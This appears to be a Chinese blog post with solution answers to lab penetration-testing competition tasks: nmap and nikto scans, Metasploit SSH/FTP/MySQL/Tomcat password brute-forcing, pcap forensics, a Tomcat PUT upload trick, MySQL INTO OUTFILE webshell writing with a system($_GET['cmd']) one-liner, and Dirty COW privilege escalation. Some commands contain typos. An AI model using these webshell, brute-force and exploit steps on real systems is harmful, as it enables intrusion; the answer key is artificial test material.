一次某平台上面的题目解题过程


任务一:namp扫描测试

  • 1.在本地PC渗透测试平台Kali中使用nmap工具查看本地路由与接口,并将该操作使用的全部命令作为FLAG提交;

nmap --iflist 172.16.101.250

  • 2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试,并将使用的脚本名称作为FLAG提交(例mysql-brute.nse);

nmap --script vnc-brute.nse - p 5900 172.16.101.250

vnc-info.nse

  • 3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试,并将该操作显示结果中VNC版本号作为FLAG提交;

nmap --script vnc-brute -A 5900 172.16.101.250

​ 可能是 nmap --script vnc-info.nse 172.16.101.250

  • 4.在本地PC渗透测试平台Kali中使用nmap发送空的UDP数据对类DNS服务avahi进行拒绝服务攻击,并将使用的脚本名称作为FLAG提交(例mysql-brute.nse);

nmap -broadcast-avahi-dos.nes 172.16.101.250

  • 5.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行模糊测试,来发送异常的包到靶机服务器,探测出隐藏在服务器中的漏洞 ,并将使用的脚本名称作为 FLAG 提交(例 mysql-brute.nse);

nmap --script dns-fuzz.nse 172.16.101.250

  • 6.在本地 PC 渗透测试平台 Kali 中使用 zenmap 工具扫描服务器场景可能存在远程任意代码执行漏洞,并将使用的脚本名称的字符串作为 FLAG 提交; (例mysql-brute.nse);

nmap --script http-shellshock.nse 172.16.101.250

  • 7.在本地PC渗透测试平台Kali中使用zenmap工具扫描服务器场景可能存在远程任意代码执行漏洞(提示:检测路径为/cgi-bin/bin,需添加–script-args uri=/cgi-bin/bin参数),并将该操作显示结果中漏洞编号和发布时间作为FLAG提交(漏洞编号和发布时间的字符串之间以分号隔开)。

nmap -sV -p- --script http-shellshock --script-args uri=cgi-binbin,cmd=ls 192.168.3.0/24

任务二、nmap扫描渗透测试2

  • 1.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,查看该命令的完整帮助文件),并将该操作使用命令中固定不变的字符串作为Flag提交;

nikto -H

  • 2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器8080端口,检测其开放状态),并将该操作使用命令中固定不变的字符串作为Flag提交(目标地址以http://10.10.10.1来表示);

nikto -h http://10.10.10.1:8080

nikto -h 172.16.101.250 -p 8080

  • 3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器80端口),将回显信息中apache服务的版本参数作为flag提交;

nikto -h 172.16.101.250

4

Apache/2.2.15 (CentOS)

  • 4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描目标服务器80端口),将回显信息中php的版本参数作为flag提交;

PHP/5.3.3

  • 5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试(使用工具nikto,扫描cgi-bin目录的文件),将该操作使用的命令中固定不变的字符串作为Flag(目标地址以:http://10.10.10.1来表示)提交;

目录扫描

nikto -h http://10.10.10.1 -Cgidirs /cgi-bin/

nikto -Cgidirs cgi-bin -h http://172.16.101.250

  • 6.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试,使用工具nikto并结合nmap的扫描结果进行扫描,首先使用nmap工具对靶机所在网段的80端口进行扫描,并将扫描结果以输出至所有格式的方式输出到指定文件target中,将输出至所有格式需要用到的参数作为flag提交;

oA

map - F -oA targer 172.16.101.250

  • 7.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试,使用工具nikto扫描第六题生成的target文件中的网站,并将该操作使用的所有命令作为FLAG提交。

nikto -host target.gnmap

任务三:SSH弱口令渗透测试

  • 1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);

-p 21,22,23

nmap -sS 172.16.101.0/24 -p 21,22,23

  • 2.通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中SSH服务对应的服务端口信息作为FLAG提交;

22/tcp

nmap -O 172.16.101.250

  • 3.在本地PC渗透测试平台BT5中使用MSF模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交;

auxiliary/scanner/ssh/ssh_login

  • 4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);

RHOSTS,PASS_FILE,THREADS,USERNAME (ip地址,密码文件的地址,线程,用户名)

  • 5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;

set RHOSTS

同上

  • 6.在msf模块中指定密码字典,字典路径为/root/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交;

aaabc3

  • 7.在上一题的基础上,使用第6题获取到的密码SSH到靶机,将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为FLAG提交。

ssh test@172.16.101.250

nauiwrevy

任务四:FTP弱口令渗透测试

1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Windows所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);

-p 21,22,23

2.通过本地PC中渗透测试平台BT5对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中FTP服务对应的服务端口信息作为FLAG提交;

21/tcp

3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交;

auxiliary/scanner/ftp/ftp_login

4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,..,..);

RHOSTS,PASS_FILE,THREADS,USERNAME

5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;

set RHOSTS

6.在msf模块中指定密码字典,字典路径为/root/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交;

133c31

7.在上一题的基础上,使用第6题获取到的密码登陆ftp服务,将该目录中flag2.bmp的图片文件中的英文单词作为FLAG提交。

sdfpsmdv

任务五:数据分析数字取证logs

  1. 使用Wireshark查看并分析Windows 7桌面下的logs.pcapng数据包文件,通过分析数据包logs.pcapng找出恶意用户目录扫描的第9个文件,并将该文件名作为FLAG(形式:[robots.txt])提交:

[star.php]

  1. 继续查看数据包文件logs.pcapng,分析出恶意用户扫描了哪些端口,并将全部的端口作为FLAG(形式:[端口名1,端口名2,端口名3…,端口名n])从低到高提交:

[21,80,445,1433,3306,3389,5000]

  1. 继续查看数据包文件logs.pcapng分析出恶意用户读取服务器的文件名是什么,并将该文件名作为FLAG(形式:[robots.txt])提交:

[name.txt]

注意读取文件大概分为两种

1.木马读取

1.1通过木马读取文件可以搜索木马上传成功之后的操作

2.MySQL读取

2.1MySQL读取文件可以通过搜索load_file函数查找

  1. 继续查看数据包文件logs.pcapng分析出恶意用户写入一句话木马的路径是什么,并将该路径作为FLAG(形式:[/root/whoami/])提交:

[C:/phpstudy/www/]

  1. 继续查看数据包文件logs.pcapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG(形式:[一句话密码])提交:

[007]

  1. 继续查看数据包文件logs.pcapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG(形式:[文件名.后缀名])提交:

[flag.zip]

  1. 继续查看数据包文件logs.pcapng将恶意用户下载的文件里面的内容作为FLAG(形式:[文件内容])提交:

[flag{Find You!}]

任务六 :数据分析数字取证-Bravo-1

  1. 分析Windows 7桌面下的Bravo-1.pcapng数据包文件,通过分析数据包Bravo-1.pcapng找出恶意用户目录扫描的第2个目录名,并将该目录名作为FLAG提交:

uploads

  1. 继续查看数据包文件Bravo-1.pcapng,分析出恶意用户通过哪个目录写入的一句话木马,并将该目录名作为FLAG提交:

phpmyadmin

  1. 继续查看数据包文件Bravo-1.pcapng分析出恶意用户读取了服务器什么文件,并将该文件名及后缀作为FLAG提交:

flag.txt

  1. 继续查看数据包文件Bravo-1.pcapng分析出恶意用户写入一句话木马的路径是什么,并将该路径作为FLAG提交:

c:/phpstudy/www/m/shell.php

  1. 继续查看数据包文件Bravo-1.pcapng分析出恶意用户连接一句话木马的密码是什么,并将一句话密码作为FLAG提交:

cia

  1. 继续查看数据包文件Bravo-1.pcapng分析出恶意用户下载了什么文件,并将文件名及后缀作为FLAG提交:

connect.php

  1. 继续查看数据包文件Bravo-1.pcapng将Web服务器连接的数据库名作为FLAG提交:

kingsman

任务七:tomcat中间件安全与加固

  1. 通过渗透机场景kali中的工具对web服务器进行扫描,浏览web服务器网页,在首页中找到tomcat服务版本号,并将其版本号作为flag提交;

7.0.79

  1. 已知此版本的tomcat具有上传漏洞,即向页面提交发送请求就会生成对应的文件。利用Burp Suite工具进行抓包,向网站首页位置提交内容为<%out.print(“hello”);%>文件名字为good.jsp的请求。将Burp Suite中的PUT请求作为flag提交(注:flag长度为16个单位长度);

PUT /good.jsp%20

  1. 通过msfconsole工具使用root目录下的的password.txt文件进行tomcat后台账户密码的破解,并将账户密码作为flag提交。(flag格式:账户_密码);

http://172.16.101.247:8080/manager

root_admin

root_zxcvbnm

search tomcat tomcat_login Tomcat_mgr_login

set rhosts ip

set rport 44444

set threads 5

  1. 用kali中的分离工具查看root目录下bm1.war文件中的flag文件,并将flag文件内容作为提交;

sdfgghjkl

  1. 通过第3题中的账户密码登陆网页(格式为服务器IP:8080/manager/html),将kali中root目录下的bm1.war文件上传后连接(连接地址为IP:8080/bm1/index.jsp)。在服务器中查找flag.txt文件,并将其内容作为flag提交;

wasdsaw

  1. 修改tomcat配置文件内容,使tomcat可以抵御第2题中的漏洞,将修改内容作为flag提交;

TRUE

任务八:mysql安全测试

172.16.101.249:8081

  1. 利用渗透机kali中的工具确定mysql的端口,将mysql端口作为flag提交;

3358

  1. 管理者曾在web界面登陆数据库,并执行了select ‘';system($_GET['cmd']); echo ''; ?>’ INTO OUTFILE ‘C:/phpstudy/WWW/test1.php’语句,结合本执行语句使用dos命令查看服务器的详细配置信息,并将服务器的系统型号作为flag提交;

Bochs

select ‘’

select ‘’ into outfile’C:/phpstudy/WWW/tes1.php’

  1. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将破解mysql的密码所需的模块当作flag提交(账户为root);

mysql_login

  1. 利用渗透机kali中的msf工具使用root目录下password.txt字典文件破解MySQL的密码,并将mysql的密码当作flag提交(账户为root);

zxcvbnm

  1. 利用上题中的数据库账户密码在web界面登陆数据库,通过select ‘’************ ‘C:/phpstudy/WWW/shell.php’语句向服务器提交名为shell.php的一句话木马,将语句中号的明文作为flag提交(为大写字母或者空格);

INTO OUTFILE

  1. 使用菜刀连接上题中的shell.php,下载服务器根目录下的压缩包,将压缩包中的flag提交

huaixiaohai

任务九:利用python脚本进行web渗透测试

  1. 使用渗透机场景kali中工具扫描确定Web服务器场景地址,浏览网站flag.html页面,并将flag.html中的flag提交;

WXL0601

  1. 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG1字符串,并将改字符串作为flag提交;

re

  1. 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG2字符串,并将改字符串作为flag提交;

url

  1. 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG3字符串,并将改字符串作为flag提交;

src

  1. 进入渗透机场景win7操作系统,完善桌面上的tupian.py文件,填写该文件当中空缺的FLAG字符串并运行成功文件会自动爬取网站tupian.php的图片,将爬取的图片数量作为flag提交;

29

  1. 结合网站的引导信息,参考源码再次将tupian.py进行修改,使tupian.py只爬取flag图片。再次运行tupian.py,并将修改的字符与爬取到的图片中的内容做为flag提交(提交格式为:修改的字符_图片内容);

BEIJINGANDBISAI

任务十:Linux操作系统渗透测试

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行操作系统扫描渗透测试,并将该操作显示结果“OS Details:”之后的字符串作为FLAG提交;

      `nmap -O 172.16.101.250`
    

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中MySQL数据库对应的服务版本信息字符串作为FLAG提交;

nmap -A 172.16.101.250

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件名称作为FLAG提交;

1、先爆破数据库密码,用九头蛇或者是msf

2、拿到密码插入一句话木马 select "" into outfile "/var/www/html/shell.php";

3、蚁剑连接就能看见

http://172.16.101.250/shell.php

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/var/www/html目录中唯一一个后缀为.html文件的文件内容作为FLAG提交;

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp文件的文件名称作为FLAG提交;

  1. 通过本地PC中渗透测试平台Kali对服务器场景Linux进行渗透测试,将该场景/root目录中唯一一个后缀为.bmp的图片文件中的英文单词作为FLAG提交。

第二种方法,提权

1、爆破出test密码,

2、查看版本型号发现是2.6.32

3、在kali中查找exp

searchsploit COW | grep 2.6

40839.c

补全目录

locate linux/local/40839.c

uname -a

4、gcc编译

gcc -pthread exp.c -o exp -lcrypt

ls

./exp

设置密码

新账号firefart 密码:

任务十一:Windows操作系统渗透测试

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;

Microsoft Windows XP|2003

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交;

microsoft-ds

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114);

202.103.24.68

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交;

gbyuikvc

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交;

serbvuik

  1. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交

presistence


文章作者: yunhea
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yunhea !
评论
评论
  目录